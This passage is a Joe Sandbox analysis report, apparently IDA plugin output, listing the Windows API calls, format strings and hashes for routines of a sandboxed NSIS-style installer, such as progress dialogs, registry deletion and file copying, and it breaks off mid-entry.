                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: Message$Send$ClientScreen
                                        • String ID: f
                                        • API String ID: 41195575-1993550816
                                        • Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                        • Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
                                        • Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                        • Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4
                                        APIs
                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                        • MulDiv.KERNEL32(0002EE00,00000064,0012FFFF), ref: 00403295
                                        • wsprintfW.USER32 ref: 004032A5
                                        • SetWindowTextW.USER32(?,?), ref: 004032B5
                                        • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                        Strings
                                        • verifying installer: %d%%, xrefs: 0040329F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2036889192.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2036859730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036912745.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2037059509.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: Text$ItemTimerWindowwsprintf
                                        • String ID: verifying installer: %d%%
                                        • API String ID: 1451636040-82062127
                                        • Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                        • Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
                                        • Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                        • Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
                                        APIs
                                        • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                        • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                        • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                        • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2036889192.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2036859730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036912745.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2037059509.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: Char$Next$Prev
                                        • String ID: *?|<>/":
                                        • API String ID: 589700163-165019052
                                        • Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                        • Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
                                        • Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                        • Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
                                        APIs
                                          • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                        • GlobalFree.KERNEL32(006C0388), ref: 00402387
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2036889192.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2036859730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036912745.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2037059509.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: FreeGloballstrcpyn
                                        • String ID: Exch: stack < %d elements$Pop: stack empty$open
                                        • API String ID: 1459762280-1711415406
                                        • Opcode ID: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                        • Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
                                        • Opcode Fuzzy Hash: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                        • Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D
                                        APIs
                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                        • RegCloseKey.ADVAPI32(?), ref: 00401504
                                        • RegCloseKey.ADVAPI32(?), ref: 00401529
                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2036889192.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2036859730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036912745.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2037059509.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: Close$DeleteEnumOpen
                                        • String ID:
                                        • API String ID: 1912718029-0
                                        • Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                        • Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
                                        • Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                        • Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
                                        APIs
                                        • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                        • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                        • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                        • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                          • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                        • GlobalFree.KERNEL32(006C0388), ref: 00402387
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2036889192.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2036859730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036912745.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2037059509.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                        • String ID:
                                        • API String ID: 3376005127-0
                                        • Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                        • Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
                                        • Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                        • Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18
                                        APIs
                                        • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                        • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                        • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                        • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2036889192.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2036859730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036912745.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2037059509.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                        • String ID:
                                        • API String ID: 2568930968-0
                                        • Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                        • Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
                                        • Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                        • Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68
                                        APIs
                                        • GetDlgItem.USER32(?), ref: 004020A3
                                        • GetClientRect.USER32(00000000,?), ref: 004020B0
                                        • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                        • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                        • DeleteObject.GDI32(00000000), ref: 004020EE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2036889192.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2036859730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036912745.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2037059509.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                        • String ID:
                                        • API String ID: 1849352358-0
                                        • Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                        • Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
                                        • Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                        • Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
                                        APIs
                                        • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                        • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2036889192.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2036859730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036912745.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2037059509.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: MessageSend$Timeout
                                        • String ID: !
                                        • API String ID: 1777923405-2657877971
                                        • Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                        • Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
                                        • Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                        • Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758
                                        APIs
                                        • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                        • wsprintfW.USER32 ref: 00404483
                                        • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2036889192.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2036859730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036912745.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2037059509.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: ItemTextlstrlenwsprintf
                                        • String ID: %u.%u%s%s
                                        • API String ID: 3540041739-3551169577
                                        • Opcode ID: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                        • Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
                                        • Opcode Fuzzy Hash: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                        • Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259
                                        APIs
                                          • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                        • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                        • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                        Strings
                                        • DeleteRegKey: "%s\%s", xrefs: 00402843
                                        • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2036889192.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2036859730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036912745.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2037059509.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                        • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                        • API String ID: 1697273262-1764544995
                                        • Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                        • Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
                                        • Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                        • Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD
                                        APIs
                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                          • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                          • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                        • lstrlenW.KERNEL32 ref: 004026B4
                                        • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                        • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2036889192.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2036859730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036912745.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2037059509.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                        • String ID: CopyFiles "%s"->"%s"
                                        • API String ID: 2577523808-3778932970
                                        • Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                        • Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
                                        • Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                        • Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2036889192.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2036859730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036912745.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2037059509.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: lstrcatwsprintf
                                        • String ID: %02x%c$...
                                        • API String ID: 3065427908-1057055748
                                        • Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                        • Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
                                        • Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                        • Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794
                                        APIs
                                        • OleInitialize.OLE32(00000000), ref: 00405083
                                          • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                        • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2036889192.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2036859730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036912745.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2037059509.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                        • String ID: Section: "%s"$Skipping section: "%s"
                                        • API String ID: 2266616436-4211696005
                                        • Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                        • Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
                                        • Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                        • Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD
                                        APIs
                                        • GetDC.USER32(?), ref: 00402100
                                        • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                        • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                          • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426979,759223A0,00000000), ref: 00406902
                                        • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                          • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2036889192.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2036859730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036912745.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2037059509.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                        • String ID:
                                        • API String ID: 1599320355-0
                                        • Opcode ID: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                        • Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
                                        • Opcode Fuzzy Hash: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                        • Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D
                                        APIs
                                          • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                        • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
                                        • lstrcmpW.KERNEL32(?,Version ), ref: 00407276
                                        • lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2036889192.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2036859730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036912745.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
